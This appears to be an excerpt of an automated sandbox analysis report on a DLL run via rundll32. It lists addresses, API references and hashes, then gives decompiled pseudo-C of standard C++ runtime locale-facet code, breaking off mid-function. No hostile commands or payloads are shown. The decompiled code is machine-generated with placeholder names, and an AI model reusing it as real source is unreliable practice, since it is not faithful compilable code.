                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d
                          0x6e20a0b0
                          0x6e20a0b0
                          0x6e20a0b3
                          0x6e20a0b7
                          0x6e20a0bb
                          0x6e20a0c8
                          0x6e20a0d0
                          0x6e20a0d2
                          0x00000000
                          0x6e20a0d2
                          0x6e20a099
                          0x6e20a099
                          0x00000000
                          0x6e20a099
                          0x6e20a097

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A060
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A06A
                          • int.LIBCPMT ref: 6E20A081
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20A0A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20A0BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A0DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A0F9
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID:
                          • API String ID: 2594415655-0
                          • Opcode ID: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction ID: 962cb3cc37723b47a9a2c980b112aa3f0b7d4fa8a928716d4613960256540487
                          • Opcode Fuzzy Hash: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
                          • Instruction Fuzzy Hash: 9111C6B691052DDBCF01DBE4C898AEDB77BBF44B15F544908E4106B2D0DFB49A48C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F183, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t814 - 0x14, 0);
				_t777 =  *0x6e2c6de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1E161C(0x6e2c6d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E2066BA(_t814 - 0x14);
					return E6E220075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E210EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t814 - 0x20);
							E6E223D74(_t814 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t758, _t777, 0x14);
							E6E206653(_t814 - 0x14, 0);
							_t778 =  *0x6e2c6db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1E161C(0x6e2c6d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E2066BA(_t814 - 0x14);
								return E6E220075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E210F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t814 - 0x20);
										E6E223D74(_t814 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t575, _t759, _t778, 0x14);
										E6E206653(_t814 - 0x14, 0);
										_t779 =  *0x6e2c6dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1E161C(0x6e2c6d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E2066BA(_t814 - 0x14);
											return E6E220075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E210F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t814 - 0x20);
													E6E223D74(_t814 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t575, _t760, _t779, 0x14);
													E6E206653(_t814 - 0x14, 0);
													_t780 =  *0x6e2c6dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1E161C(0x6e2c6d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E2066BA(_t814 - 0x14);
														return E6E220075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6E210FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t814 - 0x20);
																E6E223D74(_t814 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t575, _t761, _t780, 0x14);
																E6E206653(_t814 - 0x14, 0);
																_t781 =  *0x6e2c6df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6E1E161C(0x6e2c6d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6E2066BA(_t814 - 0x14);
																	return E6E220075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6E211057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t814 - 0x20);
																			E6E223D74(_t814 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t575, _t762, _t781, 0x14);
																			E6E206653(_t814 - 0x14, 0);
																			_t782 =  *0x6e2c6dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6E1E161C(0x6e2c6d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6E2066BA(_t814 - 0x14);
																				return E6E220075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6E2110BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t814 - 0x20);
																						E6E223D74(_t814 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t575, _t763, _t782, 0x14);
																						E6E206653(_t814 - 0x14, 0);
																						_t783 =  *0x6e2c6df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6E1E161C(0x6e2c6da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6E2066BA(_t814 - 0x14);
																							return E6E220075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6E211127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t814 - 0x20);
																									E6E223D74(_t814 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t575, _t764, _t783, 0x14);
																									E6E206653(_t814 - 0x14, 0);
																									_t784 =  *0x6e2c6df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6E1E161C(0x6e2c6da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6E2066BA(_t814 - 0x14);
																										return E6E220075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6E2111AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t814 - 0x20);
																												E6E223D74(_t814 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t575, _t765, _t784, 0x14);
																												E6E206653(_t814 - 0x14, 0);
																												_t785 =  *0x6e2c6dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6E1E161C(0x6e2c6d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6E2066BA(_t814 - 0x14);
																													return E6E220075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6E211230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t814 - 0x20);
																															E6E223D74(_t814 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t575, _t766, _t785, 0x14);
																															E6E206653(_t814 - 0x14, 0);
																															_t786 =  *0x6e2c6dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6E1E161C(0x6e2c6d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6E2066BA(_t814 - 0x14);
																																return E6E220075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6E2112B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t814 - 0x20);
																																		E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t575, _t767, _t786, 0x14);
																																		E6E206653(_t814 - 0x14, 0);
																																		_t787 =  *0x6e2c6dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6E1E161C(0x6e2c6d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6E2066BA(_t814 - 0x14);
																																			return E6E220075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6E211339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t814 - 0x20);
																																					E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t575, _t768, _t787, 0x14);
																																					E6E206653(_t814 - 0x14, 0);
																																					_t788 =  *0x6e2c6db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6E1E161C(0x6e2c6d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6E2066BA(_t814 - 0x14);
																																						return E6E220075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6E2113A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t814 - 0x20);
																																								E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t575, _t769, _t788, 0x14);
																																								E6E206653(_t814 - 0x14, 0);
																																								_t789 =  *0x6e2c6ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6E1E161C(0x6e2c6d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6E2066BA(_t814 - 0x14);
																																									return E6E220075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6E211409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t814 - 0x20);
																																											E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t575, _t770, _t789, 0x14);
																																											E6E206653(_t814 - 0x14, 0);
																																											_t790 =  *0x6e2c6de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6E1E161C(0x6e2c6d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6E2066BA(_t814 - 0x14);
																																												return E6E220075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6E211471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t814 - 0x20);
																																														E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t575, _t771, _t790, 0x14);
																																														E6E206653(_t814 - 0x14, 0);
																																														_t791 =  *0x6e2c6dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6E1E161C(0x6e2c6da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6E2066BA(_t814 - 0x14);
																																															return E6E220075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6E2114EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t814 - 0x20);
																																																	E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t575, _t772, _t791, 0x14);
																																																	E6E206653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6e2c6dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6E1E161C(0x6e2c6d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6E2066BA(_t814 - 0x14);
																																																		return E6E220075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6E211558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t814 - 0x20);
																																																				E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t575, _t773, _t792, 0x14);
																																																				E6E206653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6e2c6e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6E1E161C(0x6e2c6dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6E2066BA(_t814 - 0x14);
																																																					return E6E220075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6E2115C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t814 - 0x20);
																																																							E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t575, _t774, _t793, 0x14);
																																																							E6E206653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6e2c6dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6E1E161C(0x6e2c6d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6E2066BA(_t814 - 0x14);
																																																								return E6E220075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6E21162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6E1E1438(_t701);
																																																										E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e26851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6e26c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6E21542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6E220075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6E206FD3(__eflags, _t775);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6e2c6dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6E206FD3(__eflags, _t774);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6e2c6e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6E206FD3(__eflags, _t773);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6e2c6dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6E206FD3(__eflags, _t772);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6e2c6dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6E206FD3(__eflags, _t771);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6e2c6de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6E206FD3(__eflags, _t770);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6e2c6ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6E206FD3(__eflags, _t769);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6e2c6db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6E206FD3(__eflags, _t768);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6e2c6dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6E206FD3(__eflags, _t767);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6e2c6dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6E206FD3(__eflags, _t766);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6e2c6dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6E206FD3(__eflags, _t765);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6e2c6df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6E206FD3(__eflags, _t764);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6e2c6df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6E206FD3(__eflags, _t763);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6e2c6dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6E206FD3(__eflags, _t762);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
